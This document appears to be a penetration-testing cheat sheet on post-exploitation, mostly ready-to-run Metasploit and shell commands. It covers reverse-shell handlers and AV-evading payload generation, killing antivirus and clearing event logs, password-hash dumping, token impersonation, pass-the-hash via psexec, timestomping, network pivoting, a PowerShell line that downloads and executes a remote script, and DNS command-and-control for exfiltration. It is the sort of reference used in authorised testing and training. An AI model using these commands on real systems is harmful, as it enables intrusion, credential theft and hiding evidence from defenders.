Practical Security Assessment (Penetration Testing) - Post-Exploitation

Setting up a Listening Server for Reverse Connections

In Metasploit:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set ExitOnSession false
set LHOST ...
set LPORT ...
exploit -j

Creating Your Own Payloads

There are nice cheatsheets for msfvenom out there that help you create your own executables. When the user launches those executables, they will connect back to your machine -- providing a "reverse shell". For example, msfvenom cheatsheet.

But, there are many more sophisticated ways to generate your payload that bypasses AV. For example, Metasploit 5 contains evasion module as you can see here:

use evasion/windows/windows_defender_exe
set payload windows/meterpreter/reverse_tcp
set lhost our_real_IP
run
handler -p windows/meterpreter/reverse_tcp -H 0.0.0.0 -P 8443  # to start the listener

After creating the executable, you dump it to the user one way or the other and then make the user run it.

Migration to Another Service for a Stable Connection

Type to migrate to the explorer.exe service: run migrate -n explorer.exe

Switch to Windows Shell

Type: shell

Enumerate Windows Users

Type: net user

See Which Users are Admins

Type: net localgroup Administrators

List Sessions

Type: sessions -l

Interact with a particular session

Type: sessions -i 1

When you get a shell on Windows box

sysinfo  # take a look at the system's information
getuid      # check who we are currently
use priv    # load priv extensions for getsystem and some other options
getsystem   # try to escalate privileges to SYSTEM
run killav  # try to kill antivirus
clearev     # clear the logs
run post/windows/gather/checkvm   # check if we are in a VM or not
run post/windows/gather/hashdump  # dump hashes of user passwords
run winenum  # generic report when you compromised the machine
run getcountermeasure  # what defensive
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
reg enumkey -k HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run  # check out what is running when the machine boots up

Impersonation of a User

Do getsystem before impersonating somebody: {Just for the record, mitigation: set account to not be delegated when created in the AD to avoid impersonation}

use incognito  # allows to interact with a token in the memory
list_tokens -u  # Microsoft stores a token in memory to log in users faster
list_rokens -g  # list groups
impersonate_token DOMAIN\Administrator

Drop back to a regular user

rev2self

Gather data on the compromised machine

rtfm.py is a wonderful tool to remember all kinds of commands to gather data on the machine: users, network information, process list, system host info, file search, file shares, etc.

Prove Access

upload /home/Vitaly/Vitaly.txt c:\
timestomp C:\Vitaly.txt -v
timestomp C:\Vitaly.txt -m "07/07/1892 07:07:07"
timestomp C:\Vitaly.txt -v

Enumerate the Network inside of Meterpreter's Session

run netenum
run netenum -ps -r 10.10.30.0/24
run post/windows/gather/arp_scanner RHOSTS=10.10.30.0./24

State of the art pivoting (2019)

Pivoting via Metepreter's Session

• Setting a route through the compromised host in Metasploit (outside of Meterpreter)
• Turning the compromised machine into a router

  route print
  route add COMPROMISED_IP 255.255.0.0 SESSION_ID

  Now we can run a port scan through the compromised machine in Metasploit (outside of Meterpreter):

  use auxiliary/scanner/portscan/tcp
  set RHOSTS IP
  set THREADS 10
  run

Pivoting via SOCKS proxy in Metasploit

Read here about the proxy tunnels through Metasploit. Also, check out Exploring hidden networks with double pivoting. You create a proxy server in Metasploit that listens for connections. Then you link proxychains with that proxy server. After that, you can run any command through proxychains in the terminal. Here are the steps:

1. Get a meterpreter shell through a vulnerable service or by any other means
2. Now we need to route the traffic and there are two ways we will take a look at. The shorter version is at the end of this list and here is the longer version: use post/multi/manage/autoroute module in Metasploit (outside of meterpreter) to create routing of the traffic through the session ID of the compromised machine
3. In the autoroute module, set SESSION (if only one meterpreter session, then it should be equal 1), SUBNET(that's the network that you cannot see but the compromised system can see, e.g., 192.168.30.0), and NETMASK (e.g., 255.255.0.0) to the appropriate values
4. run the module
5. After the module completes, use auxiliary/server/socks4a module to create a proxy server in Metasploit
6. Set SRVHOST (Kali's IP address) and SRVPORT (9988 or anything else you want)
7. run the module
8. After the socks4a server started, open the terminal and edit /etc/proxychains.conf by adding a line socks4 127.0.0.1 9988 at the end of the file where 9988 is the SRVPORT you set on step 6
9. Now you can run any command in the terminal through the meterpreter session by adding proxychains word in front of the command, e.g., proxychains nmap -A 192.168.30.0/24

There is an alternative way to autoroute if you have a meterpreter shell open. Type run autoroute -s 192.168.30.0/24 to route the traffic to 192.168.30.0/24 through the current meterpreter's session on the compromised machine. If you want to run traffic for a broader network, decrease the CIDR number like run autoroute -s 192.168.0.0/16.

psexec

Pass The Hash is a technique that, given a known hash of a known user, allows to pass those known credentials to another machine without even cracking the hash itself.

use exploit/windows/smb/psexec
set SMBUSER Administrator
set SMBPASS jshkjfhaturtiuye3bj873thrdsyt34nsjfkgksh
set payload windows/x64/meterpreter/reverse_tcp
set RHOST ...
set LHOST ...
set LPORT ...
exploit

Port Forwarding in Metasploit

Port forwarding allows you to instantly forward a port from your local machine to the compromised machine. In other words, if you want to use, for example, a remote desktop rdesktop command, you can forward the port 3389. First, enter in the meterpreter session, then you can just type portfwd command, after which you can remotely connect to the compromised machine by running rdesktop 127.0.0.1:3389. Another example that tries to use psexec exploit via shares on Windows box is shown below.

portfwd add -l 445 -p 445 -r remote_host_ip
background
use exploit/windows/smb/psexec
setg SMBUser known_user
setg SMBPASS known_password
set RHOST 127.0.0.1  # the exploit has to fire back to us though, so it goes to the localhost
set LHOST our_real_IP  # this is not 127.0.0.1, but rather the external IP
set LPORT 5555  # that is the port our exploit will be listening on
run

Escalate Privileges on Windows

There is a very popular technique to escalate privileges that target misconfigured services running as a privileged local account (like Java updater). So, you can use a tool like PowerUp that not only targets and exploits those misconfigured services but also tries many other techniques to escalate privileges. To run it on the compromised machine, you can use the following PowerShell command to download PowerUp.ps1 from PowerUp and then run Invoke-AllChecks to identify possible ways of escalating privileges:

powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc/PowerUp.ps1'); Invoke-AllChecks

Additionally, privelege escalation modules are available in Metasploit as you can see here.

Also, GTFOBins allow you to find binaries that can be exploited by an attacker to bypass local security restriction.

Escalate Privileges on Linux

Similarly to Windows, there are techniques that allow you to escalate privileges on Linux. Most commonly, you are going to look for files that are world-writable, SUID/GUID files owned by root, and misconfigurations. Some tools to do that:

• Unix-privesc-check and learn how to use it from pentestmonkey
• LinEnum
• List of Linux/Unix known privilege escalation exploits which has not been updated since 2014 but is still worth looking at

SSH Tunnel

ssh -L 3389:localhost:3389 username@compromised_host_IP

Open a new terminal window and type: rdesktop 127.0.0.1

Discover the Hosts inside of Metasploit using db_nmap

db_nmap -sn -n -v --exclude our_IP remote_IP_range
-F # top 100 ports
-sS # SYN scan
-sC # run default nse scripts according to -sV
-oX # output with XML format
--reason
--open # show results if ports are open
db_nmap -p- -sS -n -v  --reason --open -oX demo-ports.xml --stylesheet=nmap.xml IP # -p- all the ports from 0 to 65535

db_nmap -sU -n -v --open --reason IP

db_import demo-ports.xml

Service Version Scan inside of Metasploit using db_nmap

db_nmap -sS -sV -sC -v -n -p 21,22,80,1617,4848,5985,8022,8080,8282,8484,8585,9200,49153 IP

Command and Control (C2) channel over DNS protocol

dnscat2 is a tool that is designed to create an encrypted C2 over DNS, which can be used as one of the most effective tunnels to send and receive data from compromised networks. This is a perfect way to evade firewalls, IDS/IPS, and exfiltrate data over DNS which is typically on. You may need to pay some money for an authoritative DNS server on Namecheap or GoDaddy.

Post-Exploitation Command Lists from Rob Fuller (Mubix)

• Metasploit Post-Exploitation
• Linux/Unix/BSD Post-Exploitation
• Windows Post-Exploitation
• OSX Post-Exploitation
• Obscure Systems (AIX, Embedded, etc.) Post-Exploitation

WriteHat - reporting tool: markdown -> html -> pdf